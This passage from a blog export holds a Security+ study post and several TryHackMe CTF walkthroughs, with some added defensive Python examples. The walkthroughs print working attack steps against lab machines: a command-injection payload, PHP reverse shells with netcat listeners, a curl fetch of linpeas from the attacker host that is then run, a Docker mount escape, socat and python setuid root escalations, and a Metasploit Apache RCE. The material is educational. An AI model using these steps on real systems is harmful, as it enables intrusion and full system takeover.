For instance, I kept confusing SOW, MOU, MOA, and MSA.\nHere is how I finally mapped them using the analogy of a professional sports team:\nAn Example of what I used : Mental Mapping of terms for a permanent understandingThis approach ensured I wasn’t just learning them temporarily for the exam, instead understanding the concepts so well you could explain them back to someone.\nMy Prep Stack:Now, for the thing everyone asks: RESOURCES.\nI wanted to keep my preparation focused, avoiding the sprawl of a dozen different books or courses, mainly due to both financial and time constraints.\nThis is what I used and what aligned with my learning style (I’m attaching the link below for you guys).\nThere are various other resources and options available, but these are the ones I felt comfortable with and relied upon:\nJason Dion’s Practice Exams (Udemy): I relied on his Set 1 \u0026amp; Set 2 practice exams primarily. Each set typically offers six mocks of 90 questions. The sheer volume of questions and the detailed explanations I needed for learning from mistakes.https://www.udemy.com/course/comptia-security-sy0-701-practice-exams/?couponCode=25BBPMXNVD35V2\nhttps://www.udemy.com/course/comptia-security-sy0-701-practice-exams-2nd-edition/?couponCode=25BBPMXNVD35V2\nExam Compass Free Quizzes: These were quick, free online quizzes, often structured as 24 separate exams of around 25 questions each. These were great for rapid-fire review and cementing terminologies.https://www.examcompass.com/comptia/security-plus-certification/free-security-plus-practice-tests\nYouTube (The PBQ Pre-Game): I knew the Performance-Based Questions (PBQs) were part of the exam, but I honestly never even looked into them until the day before!I spent time on YouTube with CyberKraft and Networking Guru. They were helpful in giving me a conceptual understanding of what the PBQ interface would look like and how to logically approach the questions.The Exam Day:Oh, the exam wording. 
CompTIA truly loves playing with words. My key to success was realizing the test is less about memorization and more about reading, analyzing, and comprehending the specific technical challenge being presented.\nFor the MCQs: Questions often contain words that are absolutely useless, just red herrings to throw you off.\nMy method was to look for the keyword, understand exactly what was being asked, think of the solution in my mind, and then check the options.\nMost questions were surprisingly simple one-liners, making it easy to spot the hint if you stayed calm. I completed 71 MCQs in a 30-minute blitz.\nFor the PBQs: I was in the same boat as countless others, scratching my head and wondering what to do. I don’t believe there is an official way to perfectly prepare for them (at least I did not find any).\nThe Rule: Flag the PBQs immediately. Complete all multiple-choice questions first. Then, return to the flagged PBQs with a clear, calm mind.\nThe Approach: The solution is pure logical thinking and understanding. Read the question a few times, see what is being mentioned, click around the screen, and explore the interface carefully. Take your time.\nPertaining to my personal experience: I had 75 questions (71 MCQs \u0026amp; 4 PBQs) and I was able to complete the entire exam and the review in about 60–70 minutes.\nThe Ready Switch:\nWhat was the most important habit?\nI’d just say, relax and enjoy the process, and stop allowing your mind to overthink it.\nThe CompTIA exam, in my opinion, is designed not to trick you, but to genuinely test your foundational knowledge; it shows they want you to succeed if you put in the conceptual work.\nI wasn’t the right person to talk about burnout because I was trying to postpone the exam! But that feeling when you’re done and everything clears out?
It feels good.\nMy final non-negotiable step was the focused revision the day before.\nGoing through all the notes, just the concepts and questions I had repeatedly missed, was what flipped my switch from unsure to ready.\nAnd the end result:\nOnce you are done with the exam, the result appears on screen as soon as you finish testing.\nIn my case it took 24 hours to receive the official mail and certificate, which will vary for everyone.\nFinal Thoughts:\nIt’s been a fun few weeks, and I genuinely enjoyed this journey of taking up the Security+ exam.\nI have to laud CompTIA; it does a great job of covering the baseline knowledge needed in the domain \u0026amp; industry.\nIn my opinion, starting with a CompTIA certification like Security+ or PenTest+ (depending on what aligns with your goals) is a great entry point into the cybersecurity world.\nI truly hope this look into my study journey helps someone else feel less stressed and more prepared.\nThanks for following along on my journey!\nI wrote this right after finishing my exam, though it may be published a few days later.\nI’m happy to answer any questions you have about my preparation in the comments below!\nAll the best to everyone planning to take it up — you’ve got this!\n","date":"31 October 2025","externalUrl":null,"permalink":"/articles/certifications/the-security-blueprint-how-hitting-the-stop-instead-of-snooze-button-forced-me-to-pass/","section":"Security Research \u0026 Articles","summary":"","title":"The Security+ Blueprint: How Hitting the “Stop” instead of“Snooze” Button Forced Me to Pass","type":"articles"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ultratech” ULTRATECH -TRY HACK ME- ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ultratech”\nThis room is classified as medium and is a ctf-type challenge.
I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Deep Dive Enumeration\nInitial Reconnaissance \u0026amp; Port Scanning\nWe start by performing a swift and aggressive port scan using RustScan to quickly identify open services on the target machine.\nrustscan -a 10.201.74.56 --ulimit 5000\nThe scan quickly reveals the following open ports: 21 (FTP), 22 (SSH), 8081, and 31331.\nNext, we run more detailed Nmap scans on the non-standard ports to determine the exact services and versions running.\nnmap -sC -sV 10.201.74.56 -p 8081\nnmap -sC -sV 10.201.74.56 -p 31331\nThe Nmap results confirm:\nPort 8081 is running Node.js.\nPort 31331 is running Apache.\nThe system is Linux, specifically Ubuntu.\nWeb Application Analysis: Finding the Footing\nWith the ports identified, we begin looking for web content.\nI first check the web page at the victim IP, which shows an “UltraTech” landing page.\nAfter scouring common directories (/images, /css, /js), nothing immediately valuable is found.\nPivoting to Gobuster, we scan the Node.js application running on port 8081:\ngobuster dir -u http://10.201.74.56:8081 -w /usr/share/dirb/wordlists/common.txt -t 100\nThis reveals two interesting endpoints: /auth and /ping.\nMeanwhile, checking the robots.txt file on the root of the site reveals a sitemap:\n/utech_sitemap.txt\nInside the sitemap, we see references to /index, /what, and /partners.html.\nThe /partners page gives us a login prompt, while /auth shows a prompt asking for a specific password.\nA quick look at the login process reveals the URL structure:\nhttp://10.201.74.56:8081/auth?login=admin\u0026amp;password=password\nThis structure is a strong
indicator that the application processes parameters directly from the query string, making it a prime candidate for injection.\nPhase 2: Initial Foothold via Command Injection\nExploiting the ping Parameter\nThe /ping route is the key.\nIt looks like it wraps the standard Linux ping command to check host status, which is a common source of command injection when the ip parameter is handed to a shell without validation.\nWe first confirm that the endpoint really pings the address we give it (and that our host is reachable):\nhttp://10.201.74.56:8081/ping?ip=10.9.2.150 # (This confirms my system is up)\nNow for the injection.\nWe use a single quote ' to break out of the quoted argument, a pipe | to chain a new command, and backticks `ls` so the shell substitutes the output of ls into the command line.\nhttp://10.201.74.56:8081/ping?ip=10.9.2.150'|'`ls`\nSuccess! The output of the ls command is returned, and we see a crucial file: utech.db.sqlite. This is our target!\nDatabase Extraction \u0026amp; Cracking User Credentials\nNow we use the same command injection vector to dump the contents of the database file.\nhttp://10.201.74.56:8081/ping?ip=10.9.2.150'|'`cat utech.db.sqlite`\nThe output looks like gibberish because it is the raw binary content of the SQLite file, but the stored rows are readable inside it and contain two MD5 password hashes: one for r00t and one for admin.\nBecause they are plain, unsalted MD5, a lookup table is enough: we paste the hashes into an online cracker like CrackStation, which quickly yields the credentials:\nr00t: n100906\nadmin: mrsheafy\nPhase 3: Lateral Movement and Privilege Escalation\nSSH Access \u0026amp; Container Identification\nWith a clear username and password, we attempt to log in via SSH as r00t with the cracked password.\nssh r00t@10.201.74.56\n# Password: n100906\nWe gain a shell!
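The /ping bug above is the textbook pattern: untrusted input concatenated into a command string that is then handed to a shell. The Python below is an added example for this write-up (not the room's code and not the author's) that reconstructs the vulnerable shape and puts the hardened form next to it. The exact command the Node.js app builds and the single quotes around the argument are assumptions, chosen to match the quote-break payload the write-up used; the payload string itself is the one from the page.

```python
"""Command injection in a ping wrapper: the vulnerable shape next to a hardened one."""
import ipaddress
import subprocess

# Constructed from the write-up: the payload that returned `ls` output.
INJECTION_PAYLOAD = "10.9.2.150'|'`ls`"

# Characters a POSIX shell interprets; any of them in a "hostname" is a red flag.
SHELL_METACHARS = set("|&;`$(){}<>\"'\\\n")


def vulnerable_command(ip: str) -> str:
    """Reconstruction (assumption) of what a naive /ping handler does: drop the
    untrusted value inside a quoted argument and hand the string to a shell.
    Returned rather than executed, so the payload can be inspected safely."""
    return f"ping -c 1 '{ip}'"


def contains_shell_metachars(value: str) -> bool:
    """Detection angle: would this value change the meaning of a shell line?"""
    return any(ch in SHELL_METACHARS for ch in value)


def hardened_argv(ip: str) -> list:
    """Hardened form: parse the value as an IP address with the standard library
    (rejects everything that is not an address) and build an argv list, so the
    value becomes a single execve() argument and no shell ever sees it."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError as exc:
        raise ValueError(f"refusing non-IP value: {ip!r}") from exc
    return ["ping", "-c", "1", str(addr)]


def run_ping(ip: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Execute the hardened form with shell=False: metacharacters in `ip` are
    never interpreted, and validation has already rejected them anyway."""
    return subprocess.run(hardened_argv(ip), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    line = vulnerable_command(INJECTION_PAYLOAD)
    print("shell would run :", line)  # the quote closes the argument, | starts a pipeline
    print("metachars found :", contains_shell_metachars(INJECTION_PAYLOAD))
    try:
        hardened_argv(INJECTION_PAYLOAD)
    except ValueError as err:
        print("hardened handler:", err)
    print("clean argv      :", hardened_argv("10.9.2.150"))
```

The validation step matters more than the argv list: passing an argv list stops the shell from interpreting the value, but a hostname field that is never validated can still be abused through the called program's own option parsing, which is why the hardened version only accepts something `ipaddress` can parse.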
Inside, we immediately check which users have a login shell:\ncat /etc/passwd | grep sh\nTo perform a thorough enumeration for privilege escalation vectors, we use linpeas.\nOpen a new tab in the terminal on the attacker machine:\npeass\ncd /usr/share/peass/linpeas\npython3 -m http.server (# default port 8000)\nOn the victim shell:\ncd /tmp\ncurl http://10.9.2.150:8000/linpeas.sh -o linpeas.sh\nls (# and we see linpeas.sh is there)\nchmod +x linpeas.sh\n./linpeas.sh\nThe output confirms the environment is a Docker container, and we also verify this by listing the Docker images on the box.\nContainer Escape: Shell on the Host\nThe discovery that the docker binary is available and that we can run containers with it is the key to our escape: anyone who can talk to the Docker daemon can mount the host filesystem into a container, so this access is equivalent to root on the host.\nWe pivot to the GTFOBins-style Docker escape.\nWe run a container that mounts the host’s root filesystem (/) at /mnt inside the container, then chroot into /mnt so that our shell’s root directory is the host’s filesystem, effectively giving us a shell on the host machine.\ndocker run -v /:/mnt --rm -it bash chroot /mnt sh\nWe are now root!!\nWith a root shell on the host, we navigate to the root user’s directory to retrieve the final artifact.\ncd /root\nls -la\ncat private.txt\nAnd it’s nothing significant.\nLooking at what is asked, I go back and:\ncd .ssh\nls -la\nI see id_rsa\ncat id_rsa\nMIIEogIBA\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nI’ve tried a slightly different format and writing style this time, exploring new ways to make things clearer and more concise for you all. Any feedback is more than welcome!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can.
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"27 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ultratech-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ULTRATECH -TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a slightly different room compared to the others. This is a beginner-friendly OSINT room from the TryHackMe… SAKURA ROOM -TRY HACK ME- ROOMHello everyone! This is a slightly different room compared to the others. This is a beginner-friendly OSINT room from the TryHackMe platform titled “Sakura Room”\nThis room is classified as easy and is a OSINT ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nHecker supremacy xDTask 1 —Task 2 — Image inspection \u0026amp; metadataI start by clicking on the image and inspecting it\nSince I see the binary blobs in the background I feel it has something to do with decoding binary to text.\nSo through inspecting the page I find the Binary and copy paste it in a\nBinary -\u0026gt; Text converter and I get hit with a message to check the metadata\nThe minute I see the word metadata, exif tools spawns in my mind\nI head to the online tool\nView file metadata (EXIF data) onlineEasily view EXIF metadata of images and videos online. 
Upload files up to 200MB to access camera settings, date… (ezgif.com)\nI paste the URL directly and that shows me the file path, which contains\nSakuraSnowAngelAiko/\nTask 3 — Find social profile, get real name, PGP to extract email\nI go to the browser and just search up SakuraSnowAngelAiko, and I see the X page (a.k.a. Twitter) \u0026amp; GitHub link.\nClicking on the X page and scrolling through, I see the introduction post, and from there I find the name is:\nAiko Abe\nNow, thinking about the e-mail, I remember seeing the PGP folder.\nThat leads the way to obtaining the e-mail.\nI copied the PGP content from the public key file and head to the terminal.\nNext I create an .asc file:\nnano osi.asc\nThen I paste the PGP content here and save it.\nThen, using this command (gpg prints the key’s user ID, which includes the e-mail address, when it imports the key):\ngpg --import osi.asc\nThis shows me the e-mail:\nSakuraSnowAngel83@protonmail.com\nTask 4 — Ethereum address \u0026amp; blockchain tracing\nI remember seeing a repo during the initial search which was called ETH.\nSo I head to it and scour through it; I end up seeing a crypto wallet address, but it feels incorrect even when I search it up.\nThen, checking the commit history, I see the previous version of the file, and this leads me to the real address, which is the answer to the 2nd subpart:\n0xa102397dbeeBeFD8cD2F73A89122fCdB53abB6ef\nNow, through personal knowledge I know ETH stands for\nEthereum\nwhich answers the initial question.\nNext, searching the address online, I get to see the activity on this website:\nhttps://etherscan.io/txs?a=0xa102397dbeebefd8cd2f73a89122fcdb53abb6ef\nI head straight to the transactions tab and sort it.\nThen, scrolling down to 2021 and the specifics mentioned, I find the mining pool, which is:\nEthermine\nThrough scrolling I see the other type of crypto it was converted to:\nTether USD\nand this answers the 4th part of the question.\nTask 5 — Twitter findings, Wi‑Fi \u0026amp; BSSID\nNow, to find the answers to the questions, I head back to the X page.\nSince I already know both X handles, answering the username is very
easy:\ncurrent handle: @SakuraLoverAiko\nNow to find the BSSID, I remember seeing on the X page a screenshot with the clue of the Wi-Fi details.\nHeading to that post, it hints at something about deep searching and using a darknet paste tool (deeppaste).\nBut as I couldn’t find an operating version of the tool, by using the hint we see the image in deeppaste v3 and see the home Wi-Fi SSID DK1F-G and password Fsdf324T@@.\nNow to get through this we use the famed tool WiGLE, a crowdsourced database of wireless networks that maps SSIDs and BSSIDs to the locations where they were observed.\nI create the account and use the advanced search feature, paste the SSID value DK1F-G and query it, and that leads me to the BSSID:\n84:AF:EC:34:FC:F8\nTask 6 — Visual geolocation (landmarks \u0026amp; blossoms)\nNow for the final set of tasks.\nI head back to the X page and, as per the question, the image shows beautiful scenery of cherry blossoms.\nNow, taking the image, I simply throw it into Google Lens and it automatically shows me the clue about the Okame variety of blossom and the Washington Monument in the background.\nThis was a major prompt, and by searching for the closest airport we see:\nRonald Reagan Airport {DCA}\nNext, for the layover, there is a post, and the first thing that catches my eye is the logo and name below it (JAL), which confirmed my suspicion that it was Japan Airlines.\nNow with a tiny search I confirmed that it was the famous:\nHaneda Airport {HND}\nNext, with it already being in Japan, I take one good look at the map, head to Google Maps right away and look at Japan zoomed out.\nI see the unique island structure {I’m referring to Sado Island :)}. Quickly zooming in I see the lake, and its name is:\nLake Inawashiro\nAnd, for the last part, to find out his home region/city, I head straight back to WiGLE.\nOn the same page of the SSID where I found the BSSID, I see the Map feature, and clicking on it I see:\nHirosaki\nThese are the answers compiled :)\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nDoing this room gave me 2 takeaways:\nOSINT though complex is actually
funJapan is so beautiful, I have to pay a visit and soak in some the beauty🥹Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"18 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/sakura-room-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SAKURA ROOM -TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner rated room from the TryHackMe platform titled “DAV” DAV- TRY HACK ME- ROOMHello everyone! This is a beginner rated room from the TryHackMe platform titled “DAV”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nHas absolutely no correlation, but it just flashed in my head when I saw the room\nI started by visiting the target IP in a browser and was presented with a default Apache page, a quick sanity check that HTTP (port 80) was live.\nI then scanned the host and enumerated directories:\nrustscan -a 10.201.10.122 --ulimit 5000\ngobuster dir -u http://10.201.10.122:80 -w /usr/share/dirb/wordlists/common.txt -t 100\ngobuster revealed a /webdav path.\nVisiting http://10.201.10.122/webdav prompted for authentication and returned a 401, so WebDAV was clearly present and protected by HTTP authentication.\nI tried a few things (including a quick SQLi attempt and common default creds) without success.\nThen, searching for known default credentials for WebDAV, I found the XAMPP defaults:\nuser: wampp\npass: xampp\nThose credentials authenticated successfully.\nBrowsing the directory revealed a user entry that looked like an htpasswd line: a username followed by an Apache APR1 (MD5-based) password hash\nwampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91\nThe website also suggested the presence of the cadaver WebDAV client, and this makes for a much more streamlined approach:\ncadaver http://10.201.10.122/webdav/\nUsing cadaver with the authenticated session allowed file upload (PUT), so I uploaded a simple PHP reverse shell.\n(PS: always change the IP/port in shells to match your listener lol)\nUploading it:\nput /root/shell.php\nThen I set up a netcat listener:\nnc -lvnp 4433\nTriggering the uploaded PHP shell via the browser:\nhttp://10.201.10.122/webdav/shell.php\nBAM!!, we catch the shell\nNow, navigating through the shell:\ncd /home\nls -la\ncd merlin\nls -la\ncat user.txt\nThis gives us the user flag:\n449b40fe93f78a938523b7e4dcd66d2a\nNext, I immediately try escalating to root privileges:\nsudo -l\n# (output showed)\n# (ALL) NOPASSWD: /bin/cat\nChecking GTFOBins for cat: because /bin/cat can be run with sudo without a password, any file on the system can be read as root. That does not give a root shell by itself, but it is enough to read the flag (or /etc/shadow, for that matter). GTFOBins names the target file LFILE, and the root flag usually sits in the /root folder:\nLFILE=/root/root.txt\nsudo cat $LFILE\nThen we get the root
flag:\n101101ddc16b0cdf65ba0b8a7af7afa5\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/dav-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"DAV- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “All In One” ALL IN ONE -TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “All In One”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nVisiting the victim IP, but it’s just a default Apache page.\nLet’s start with the rustscan:\nrustscan -a 10.201.115.191\nOpen ports are: 21, 22, 80\nChecking FTP:\nftp 10.201.115.191\n# then when prompted:\n# Username: anonymous\n# Password: anonymous\nI tried scouring through it but found nothing, so I exited and ran a gobuster scan to look for hidden directories:\ngobuster dir -u http://10.201.115.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100\nFound /wordpress and /hackathon.
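The /hackathon page that comes next hides the password as a Vigenère cipher, with the ciphertext and the key sitting side by side in the page source (Dvc W@iyur@123 and KeepGoing, per the write-up). Rather than trusting an online decoder with a credential, here is a decoder added for this write-up (my code, not the room author's). It mirrors the convention the online tools use and the room relies on: letters are shifted by the key, while digits and symbols such as @ are copied through untouched and do not advance the key.

```python
"""Vigenère decoder that passes non-letters through the way online decoders do."""
import string

UPPER = string.ascii_uppercase

# Constructed from the /hackathon page source: ciphertext and key, separated by '&'.
PAGE_STRING = "Dvc W@iyur@123 & KeepGoing"


def vigenere(text: str, key: str, decrypt: bool = True) -> str:
    """Shift each ASCII letter by the corresponding key letter. Non-letters are
    copied unchanged and do NOT consume a key character, which is how the common
    decoders (and this room) treat '@' and digits. Case is preserved."""
    key_shifts = [UPPER.index(k) for k in key.upper() if k in UPPER]
    if not key_shifts:
        raise ValueError("key must contain at least one letter")
    out = []
    ki = 0  # index into the key, advanced only on letters
    for ch in text:
        if ch.isalpha() and ch.upper() in UPPER:
            base = ord("A") if ch.isupper() else ord("a")
            shift = key_shifts[ki % len(key_shifts)]
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def split_hint(page_string: str) -> tuple:
    """The page gives 'ciphertext & key'; pull the two apart."""
    cipher, _, key = page_string.partition("&")
    return cipher.strip(), key.strip()


def recover_password(page_string: str = PAGE_STRING) -> str:
    """Decode the page string into the plaintext hint."""
    cipher, key = split_hint(page_string)
    return vigenere(cipher, key)


if __name__ == "__main__":
    plaintext = recover_password()
    print(plaintext)                      # Try H@ckme@123
    print(vigenere(plaintext, "KeepGoing", decrypt=False) == split_hint(PAGE_STRING)[0])
```

Note the decoded string starts with "Try "; the part after it is the actual password used for the WordPress login below.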
These are the next pages that need to be visited.\nIn /hackathon the page has the word Vinegar, and inspecting the page source we see this string:\nDvc W@iyur@123 \u0026amp; KeepGoing\n“Vinegar” is a hint at Vigenère, a key-based polyalphabetic substitution; decoding with KeepGoing as the key gives the plaintext password.\nSo using an online decoder we get Try H@ckme@123\nNext going to /wordpress\nOn the homepage I see the user elyana, which suggests a username to pair with the password.\nGo to http://10.201.115.191/wordpress and then /wp-admin. Credentials used:\nUsername: elyana\nPassword: H@ckme@123\nLogin successful, giving admin access to the dashboard. Admin access to WordPress allows editing theme files (PHP), which is the classic way to get RCE in CTFs.\nNext, starting the reverse shell.\nPentestMonkey PHP reverse shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php\nDownload/copy the reverse shell script. Edit the script and change the IP and port to match your machine; I used port 4444.\nStarting the listener:\nnc -lvnp 4444\nNow to execute the reverse shell in WordPress we navigate to\nAppearance -\u0026gt; Theme Editor\nOpen one of the theme’s PHP files (I used Theme Functions, functions.php), remove the preexisting code, paste the full PHP reverse shell (ensure IP and port are set accordingly) and click Update File. Then load a page that includes that file (functions.php is included on every page of the active theme) and the netcat listener catches the connection: you have a shell.\nOnce in:\npwd\ncd /home\ncd elyana\ncat user.txt\n# got: Permission denied\ncat hint.txt -\u0026gt; says the hint is somewhere on the system\nSo I just use the find command to search for the closest related thing, files owned by elyana:\nfind / -type f -user elyana 2\u0026gt;/dev/null\nfind / starts at root and searches the filesystem.\n-type f restricts results to files only.\n-user elyana finds files owned by user elyana.\n2\u0026gt;/dev/null hides permission-denied errors to keep the output
readable.\nThe search turned up private.txt in /etc/mysql/conf.d/\nThen:\ncd /etc/mysql/conf.d/\nls -la\ncat private.txt\nWe get this:\nuser: elyana\npassword: E@syR18ght\nSo we SSH using these creds:\nssh elyana@10.201.115.191\n# Password: E@syR18ght\nOnce in the shell:\ncat user.txt\n# Output: VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259\nHaving fewer braincells than usual lol, I go to the dcode cipher identifier and find it’s base64 (the VEhN prefix is simply what THM looks like once base64-encoded).\nSo heading to a base64 decoder we get the user flag:\nTHM{49jg666alb5e76shrusn49jg666alb5e76shrusn}\nNow to escalate privileges:\nsudo -l\nsudo -l lists the allowed sudo commands for the current user and whether a password is required.\nResult: (ALL) NOPASSWD: /usr/bin/socat\nThe minute I see this I know the routine: head to GTFOBins, search for socat, take the sudo line and paste it in:\nsudo socat stdin exec:/bin/sh\nConfirming I’m root and going for the root.txt flag:\nwhoami\ncd /root\nls -la\ncat root.txt\nDecoding this (base64 again) we get the flag:\nTHM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nThis was scheduled for release on Sunday but has rolled out now due to an unexpected delay. My apologies for the wait.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/all-in-one-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ALL IN ONE -TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone!
This is a beginner-friendly room from the TryHackMe platform titled “Oh My Web server” OH MY WEBSERVER -TRY HACK ME- ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Oh My Web server”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nLaunching rustscan against the victim IP:\nrustscan -a 10.10.162.192\nAlso loading the web page: it’s a “consult” landing page.\nUsing Wappalyzer I see the Apache version and suspected it looked old.\nChecking the Apache version (2.4.49) and searching for exploits quickly turns up RCE modules: 2.4.49 is the release affected by the path traversal bug CVE-2021-41773, which turns into remote code execution when mod_cgi is enabled.\nPivoting to Metasploit to execute the exploit:\nmsfconsole\nsearch apache 2.4.49\nuse 0 (# the first search result; the module for this bug is exploit/multi/http/apache_normalize_path_rce)\nset LHOST tun0 (# your VPN interface, i.e. your system IP)\nset ssl false (# disables SSL so the module targets HTTP on port 80 instead of 443)\nset RPORT 80 (# sets the remote port to 80)\nset RHOST 10.10.162.192\nrun\nOnce in, we get a shell; id shows we are running as daemon.\nStabilizing the shell:\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nNow checking the contents:\nls lists files (not many interesting things here).\ncd /home: it is empty, which raised suspicion (typical for containers).\nifconfig: the network info shows docker-style interfaces (a 172.17.x.x address), so we are likely running inside a container.\nBecause containers frequently have the host or other containers reachable on an internal bridge network, we prepare for further enumeration.\nNow we serve linpeas from our machine and pull it into the exploited shell.\nYou can type “peass” to verify that you have linpeas installed. On your machine (attacker):\ncd /usr/share/peass/linpeas\npython3 -m http.server\nOn the victim (Metasploit shell):\ncd /tmp\ncurl 
http://10.9.1.120:8000/linpeas.sh -o linpeas.sh\nls\nchmod +x linpeas.sh\n./linpeas.sh\ncd /tmp: a good writable location inside the container.\ncurl ... -o linpeas.sh: download the script from your machine.\nchmod +x: make it executable.\n./linpeas.sh: run the local enumeration.\nThe environment is confirmed to be a Docker container. The linpeas output included:\nFiles with capabilities (limited to 50): /usr/bin/python3.7 = cap_setuid+ep\nThis is a crucial find: python3.7 carries the cap_setuid capability in its effective and permitted sets (+ep), so any process started from that binary may call setuid() to become any user, including root, without being a SUID binary. That is a direct path to root inside the container.\nGTFOBins lists this under the Capabilities section for python (not the sudo section):\npython3 -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'\npython3 -c runs the given Python snippet.\nimport os; os.setuid(0) sets the real and effective UID to 0 (root); the call succeeds only because the binary carries CAP_SETUID.\nos.system(\"/bin/sh\") opens a shell, which inherits UID 0.\nBecause /usr/bin/python3.7 had cap_setuid+ep, this elevated us to root in the container.\nPost exploitation:\nid\ncd /root\nls -la\ncat user.txt\nWe get the flag:\nTHM{eacffefe1d2aafcc15e70dc2f07f7ac1}\nNow to escape the container environment to reach the host or other services on the container network.
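Reading capability lines out of linpeas or `getcap -r / 2>/dev/null` by eye does not scale, so here is an added example (my code, not the room author's and not part of linpeas) that parses getcap output in both the older `path = cap+ep` layout and the newer libcap `path cap=ep` layout, and flags the capabilities that hand an interpreter a path to root. The sample output is constructed; only the python3.7 line is the one linpeas printed in this room, and the severity split (effective bit set versus permitted only) is my triage rule.

```python
"""Triage `getcap -r / 2>/dev/null` output for capabilities that lead to root."""
import os
import re
from dataclasses import dataclass

# File capabilities that hand an interpreter or general-purpose tool a path to root.
DANGEROUS_CAPS = {
    "cap_setuid": "call setuid(0), then exec a shell",
    "cap_setgid": "join any group (shadow, docker, ...)",
    "cap_dac_override": "ignore write permission checks on files",
    "cap_dac_read_search": "read any file (/etc/shadow, root's SSH keys)",
    "cap_sys_admin": "mount, namespaces and most other kernel admin operations",
    "cap_sys_ptrace": "attach to and inject into root-owned processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of any file",
}
# Binaries where the capability is trivially scriptable (GTFOBins "Capabilities" entries).
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "lua", "gdb", "vim", "view")

# A clause is "cap_a,cap_b" followed by an operator and the flag letters e, i, p.
CLAUSE_RE = re.compile(r"^((?:cap_\w+)(?:,cap_\w+)*)([=+-])([eip]*)$")


@dataclass
class CapFinding:
    path: str
    cap: str
    flags: str
    severity: str   # "immediate" (effective bit set) or "latent" (permitted only)
    note: str


def parse_getcap_line(line):
    """Return (path, [(cap, flags), ...]) for a getcap line, or None.
    Handles libcap < 2.41 ("path = cap+ep"), libcap >= 2.41 ("path cap=ep")
    and the linpeas prefix ("Files with capabilities (...): path = cap+ep")."""
    line = line.strip()
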